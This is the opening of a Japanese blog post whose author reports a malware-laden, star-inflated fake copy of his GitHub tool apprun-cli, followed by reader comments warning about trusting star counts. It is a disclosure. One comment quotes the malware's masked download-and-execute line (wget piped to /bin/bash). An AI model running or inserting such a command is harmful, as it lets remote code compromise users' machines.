自分のOSSのマルウェア入り偽物を作られたので通報した - 酒日記 はてな支店

物騒な世の中です。皆様お気をつけください。 3行でまとめ 自作の OSS、fujiwara/apprun-cli のマルウェア入り偽物を作られて GitHub で公開されました 偽物には大量の新規アカウントがスターを付けていたため、検索でオリジナルのものより上位に表示される状態でした GitHub に通報したところ、偽物を作ったアカウントはbanされたようです 経緯 2024年末に、さくらのAppRun用デプロイツール apprun-cli という OSS を公開しました。 github.com 2025年2月10日 12時過ぎのこと、謎の人物が X で apprun-cli を宣伝しているのを見つけました。 どう見ても自分の物と同じ(コピー)なのですが、妙にスターが多い。リポジトリをのぞいてみると、fork ではなくコードがすべて commit 履歴を引き継がない状態でコピーされ、スター

[sfujiwara]

物騒な世の中ですね

[thaim]

これはたまたま気付けてよかったというのと、13時間で対応してくれるのはよかった。より良い対処をするのが難しい問題だ。

[YassLab]

“偽物には大量の新規アカウントがスター / 検索でオリジナルのものより上位に表示 / 「名前で検索してスターがいっぱいついていて上に出てくるもの」を安易に入れてしまうと、まんまとマルウェアの餌食になる可能性”

[tikuwa_ore]

三行まとめが不要なくらい分かり易い要点をまとめた内容で、ブログ主の腕前が光る。ご対応お疲れ様でした。／いい加減、故意のスパム配布は死刑or無期懲役でいいと思う。社会リソースの無駄すぎる。

[Fushihara]

そのレポジトリの作成日・公開非公開切り替え日・レポジトリ名が変更されていたらその履歴・スターの増加数の推移グラフ くらいはデフォルトで表示して欲しい

[prograti]

このXのアカウントがポストしてるリポジトリ覗いてみたけど似たようなの量産してますね... https://github.com/vigorouspossi/webhooked/blob/84822f63fcc03da472087158baac0c22a9a8dd5a/cmd/root.go#L54-L61

[kshtn]

ブックマークにgithubへのリンクだけ書いてるスパムが結構あって都度通報してるけど、こういう背景があるのかしら

[napsucks]

notice and takedownが機能してるのはまだ救いだが大量の新規アカウントによる評価とか事前にフィルタしてくれよという気も。

[zoidstown]

“ということで、GitHub で OSS を探すときは「名前で検索してスターがいっぱいついていて上に出てくるもの」を安易に入れてしまうと、まんまとマルウェアの餌食になる可能性があります。皆様お気をつけください。”

[rryu]

コミット履歴を全部捨てているのはマルウェアを入れたコミットあからさまに残ってしまうからか。

[azzr]

検索かけると同様のマルウェアがたくさん出てくる。 https://github.com/search?q=%22%3A%3D+%5C%22%2Fbin%2Fsh%5C%22%22+NOT+shell+NOT+cmd+NOT+interpreter+NOT+command1+NOT+task&type=code ／ 運営側に通報すると半日ほどで対応してくれてる。

[isrc]

GitHub で OSS を探すときは「名前で検索してスターがいっぱいついていて上に出てくるもの」を安易に入れてしまうと、まんまとマルウェアの餌食になる可能性があります。

[tmatsuu]

恐ろしいな。気づかなかった可能性もあるし、今も気づかれていないOSSが存在しそうだ。スターの数だけで判断するなかれ。はい。

[namakoman]

気づけなかったらと思うと恐ろしすぎる…

[nyarla-net]

これコピペされる側は対策しようがないとして、OSSを使う側としてはどう対策すると良いんだろ / 外部OSSを使う場合には podman とかのコンテナ技術で隔離すると言う手段は思いつくけど、全面的に行なうのは難しいからなぁ

[syamatsumi]

こえーな……

[sonots]

なんと

[toritori0318]

ひどい話

[ichiken7]

こういうの、Banされるだけでなく、正しく刑罰がくだるような世の中になって欲しい。

[progrhyme]

お疲れ様でした。要注意ですね

[ockeghem]

わかりやすいまとめ。世の中にはこういうのがいっぱいあるようですぞ

[unmarshal]

ひとつひとつのOSSを精査した上で導入する事が必然、と考えると当然なのかも

[kenzy_n]

どこのまがいものがきたのだ。

[ss49919201]

怖いな…。 スター数以外で自分が見るところで言えば、最新のコミット日時、issue/PRの履歴、技術ブログでの紹介有無くらいなんだが、あまり細部まで見てないこともあるので気をつけよう。

[efcl]

GitHubリポジトリのコピー + マルウェア入りのものが作られているという話。 リポジトリのStarは偽装されていて、go言語中心なのはリポジトリを指定してインストールする仕組みになってるからかな。

[utsuidai]

対応ありがたいっすね。しかし、ライセンスクリアしてるのか…

[pascal256]

これは色んな意味で恐ろしい...

[kabuquery]

バグバウンティで偽モジュール作って発火させて儲けてる人いるらしい

[kazoo_oo]

恐ろしすぎる

[ToTheEndOfTime]

Clineとか大丈夫ですか

[shingo-sasaki-0529]

スター数を選定の根拠にしちゃいがちだから気をつけないと。

[ymdicr0101]

“wget -O - http://***.***.***.***/storage/de373d0df/a31546bf | /bin/bash &”

[nilab]

“GitHub で OSS を探すときは「名前で検索してスターがいっぱいついていて上に出てくるもの」を安易に入れてしまうと、まんまとマルウェアの餌食になる可能性があります”

[Windymelt]

こんなことあるのか〜。OSSはユーザ名と一緒に覚えるしかなさそうだ。コミットにちゃんとデジタル署名とかしたほうがいいね

[peatnnuts]

つーか、なんでgithubなスパムが居るんだよ。 こんなのが蔓延ったらサービスは終わりだよ。

[ebibibi]

これは邪悪ですね。

[soybeancucumber]

良記事

[koyancya]

こわ……

[joker1007]

一定期間経ってないアカウントのスターは数に反映されない、ぐらいの対策はやって欲しいところだなあ……。

[taku-o]

同じことする時に参考になる

[bopperjp]

こわっ。どれが本物なのかどうやって見分けたらいいんだろう。。